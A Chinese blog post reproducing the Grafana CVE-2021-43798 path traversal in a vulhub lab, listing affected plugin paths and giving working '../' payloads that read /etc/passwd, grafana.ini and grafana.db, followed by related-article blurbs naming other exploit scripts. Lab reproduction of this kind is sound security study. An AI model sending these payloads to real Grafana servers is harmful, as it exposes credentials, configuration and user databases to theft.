CVE-2021-43798——Grafana 未授权任意文件读取

最新推荐文章于 2024-04-16 20:25:50 发布
最新推荐文章于 2024-04-16 20:25:50 发布
阅读量421 收藏
点赞数
分类专栏: 漏洞复现 文章标签: grafana 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59201520/article/details/129848802
版权

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

未授权的攻击者利用该漏洞,能够获取服务器敏感文件

 

该漏洞是由于Grafana 插件引发的目录穿越漏洞导致任意文件读取,由于Grafana的读取文件接口存在未授权,且未对文件地址进行过滤,导致可以目录穿越实现系统任意文件读取

受影响版本:Grafana 8.0.0 - 8.3.0

漏洞复现

vulhub靶场环境

docker-compose up -d #开启容器

进入3000端口查看,进入grafana的登陆界面

使用burpsuit对这个页面进行抓包

 这里我们需要用到里面的受影响的插件来构造POC

官方发布的受影响的插件名单 

<grafana_host_url>/public/plugins/alertlist/
    <grafana_host_url>/public/plugins/annolist/
    <grafana_host_url>/public/plugins/barchart/
    <grafana_host_url>/public/plugins/bargauge/
    <grafana_host_url>/public/plugins/candlestick/
    <grafana_host_url>/public/plugins/cloudwatch/
    <grafana_host_url>/public/plugins/dashlist/
    <grafana_host_url>/public/plugins/elasticsearch/
    <grafana_host_url>/public/plugins/gauge/
    <grafana_host_url>/public/plugins/geomap/
    <grafana_host_url>/public/plugins/gettingstarted/
    <grafana_host_url>/public/plugins/grafana-azure-monitor-datasource/
    <grafana_host_url>/public/plugins/graph/
    <grafana_host_url>/public/plugins/heatmap/
    <grafana_host_url>/public/plugins/histogram/
    <grafana_host_url>/public/plugins/influxdb/
    <grafana_host_url>/public/plugins/jaeger/
    <grafana_host_url>/public/plugins/logs/
    <grafana_host_url>/public/plugins/loki/
    <grafana_host_url>/public/plugins/mssql/
    <grafana_host_url>/public/plugins/mysql/
    <grafana_host_url>/public/plugins/news/
    <grafana_host_url>/public/plugins/nodeGraph/
    <grafana_host_url>/public/plugins/opentsdb
    <grafana_host_url>/public/plugins/piechart/
    <grafana_host_url>/public/plugins/pluginlist/
    <grafana_host_url>/public/plugins/postgres/
    <grafana_host_url>/public/plugins/prometheus/
    <grafana_host_url>/public/plugins/stackdriver/
    <grafana_host_url>/public/plugins/stat/
    <grafana_host_url>/public/plugins/state-timeline/
    <grafana_host_url>/public/plugins/status-history/
    <grafana_host_url>/public/plugins/table/
    <grafana_host_url>/public/plugins/table-old/
    <grafana_host_url>/public/plugins/tempo/
    <grafana_host_url>/public/plugins/testdata/
    <grafana_host_url>/public/plugins/text/
    <grafana_host_url>/public/plugins/timeseries/
    <grafana_host_url>/public/plugins/welcome/
    <grafana_host_url>/public/plugins/zipkin/

以下演示就使用gauge来进行,在抓到的数据包的GET后面添加payload进去

#读取passwd目录

/public/plugins/gauge/../../../../../../../../../etc/passwd

 
#读取Grafana配置文件

/public/plugins/gauge/../../../../../../../../../../../../../../../etc/grafana/grafana.ini

 

 #读取grafana数据库

/public/plugins/gauge/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db

 

修复建议

处于受影响版本的应立即升级

-----------------------------------------------------------------------------------------------------------------------------

(如果文章内容有误,麻烦大佬们指点,我会及时改正,如果帮助到了您,麻烦点个赞呗)

Lil.Jave
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像,使用以下命令标记该映像并将其推送到Dockerhub。 docker login docker build -t validationwebhook:1.0 . docker tag validationwebhook:1.0 darryk/dev:1.0 docker push darryk/dev:1.0 现在,您可以将使用Node.js应用程序创建的映像部署到您的K8s集群中。 webhook-deploy.yaml将在群集中部署所有必需的组件。 kubectl apply -f webhook-d
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972 工作于 VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark: 对于vCenter6.7 U2 + vCenter 6.7U2 +在内存中运行网站,因此此Exp不适用于6.7 u2 +。 需要测试 vCenter 6.5 Linux(VCSA)/窗口等待测试 vCenter 6.7 Linux(VCSA)/窗口等待测试 vCenter 7.0 Linux(VCSA)/窗口等待测试 细节 突破为任意文件上传 存在问题的接口为/ui/vropspluginui/rest/services/uploadova ,完整路径( https://domain.com/ui/vropspluginui/r
CVE-2021-43798 Grafana 文件读取漏洞
最新发布
2301_79724395的博客
04-16 721
影响版本 Grafana 8.0.0-beta1 to 8.3.0攻击者可以通过将包含特殊目录遍历字符序列(…/)的特制HTTP请求发送到受影响的设备来利用此漏洞。成功利用该漏洞的攻击者可以在目标设备上查看文件系统上的的任意文件
CVE-2021-22192:CVE-2021-22192靶场:授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:授权用户RCE漏洞 0x10靶场环境 0x20目录结构 CVE-2021-22192 ├── README.md ............... [此 README 说明] ├── imgs .................... [辅助 README 说明的图片] ├── gitlab .................. [Gitlab 容器的挂载目录] │ ├── Dockerfile .......... [Gitlab 的 Docker 构建文件] │ ├── config .............. [Gitlab 配置挂载目录] │ ├── data ................ [Gitlab 数据挂载目录] │ ├── logs ................ [Gitlab 日
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-43798 Grafana 授权任意文件读取漏洞
Jietewang的博客
12-15 7876
CVE-2021-43798 Grafana 授权任意文件读取漏洞 漏洞原理 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。 攻击者可以通过将包含特殊目录便利字符序列(../)的特制HTTP请求发送到受影响的设备来利用此漏洞,成功利用该漏洞的攻击者可以在...
Grafana 授权任意访问漏洞(CVE-2022-32275)
murphysec的博客
06-08 9219
CVE-2022-32275漏洞是由于Grafana存在授权访问漏洞,攻击者可以通过特定url,访问任意用户系统界面及读取任意文件。该漏洞影响范围一般。该问题已在新版本中修复,建议用户更新到最新版本。参考链接:https://nvd.nist.gov/vuln/detail/CVE-2022-32275 MISC:https://github.com/BrotherOfJhonny/grafana/blob/main/README.md       【使用墨菲安全的开源工具帮您快速检测代码安全】 墨菲安全
[文件读取]Grafana授权任意文件读取
wj33333的博客
11-14 393
描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。查看etc/passwd。查看/tmp/flag。
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的...
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
Grafana授权任意文件读取
Amateur
12-08 398
CVE-2021-43798 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。 该漏洞危害等级:高危 影响范围 经测试,目前最新版本(Grafana v8.2.6)仍存在漏洞。 根据目前FOFA系统最新数据(一年内数据),显示全球范围内(app=“Grafana”)共有 234,937 个相关服务对外
【漏洞复现】Grafana任意文件读取漏洞 (CVE-2021-43798)
做自己喜欢的事,并将其发挥到极致!
12-08 1157
0X01 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。 0x02 源码分析 搜索漏洞存在路径 /public/plugins/ 在api.go文件中 r.Get("/public/plugins/:pluginId/*", hs.getPluginAssets) 跟踪对应的 getPlugin
Grafana 授权任意文件读取漏洞(CVE-2021-43798)
m0_58596609的博客
12-27 2278
Grafana 授权任意文件读取漏洞(CVE-2021-43798)
cve-2021-43798
07-28
CVE-2021-43798是指Grafana中的授权任意文件读取漏洞。攻击者可以利用这个漏洞读取系统上的敏感文件。\[1\] 为了利用这个漏洞,攻击者可以使用curl命令下载Grafana Enterprise 8.3.0版本的压缩包,并解压缩。\[2\]然后,可以使用提供的Python脚本exp.py来执行攻击。该脚本会尝试读取目标服务器上的/etc/passwd文件,以确认是否存在漏洞。\[3\] 需要注意的是,这个漏洞只会影响使用受影响版本的Grafana,并且需要攻击者能够与目标服务器建立连接才能利用漏洞。建议及时更新Grafana以修复这个漏洞,并确保服务器的安全配置和访问控制措施得到有效实施。 #### 引用[.reference_title] - *1* [CVE-2021-43798 Grafana 授权任意文件读取漏洞](https://blog.csdn.net/Jietewang/article/details/121961312)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [漏洞分析|CVE-2021-43798 - Grafana文件读取漏洞](https://blog.csdn.net/weixin_42508548/article/details/122061449)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2021-43798——Grafana 授权任意文件读取](https://blog.csdn.net/weixin_44309905/article/details/122008606)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值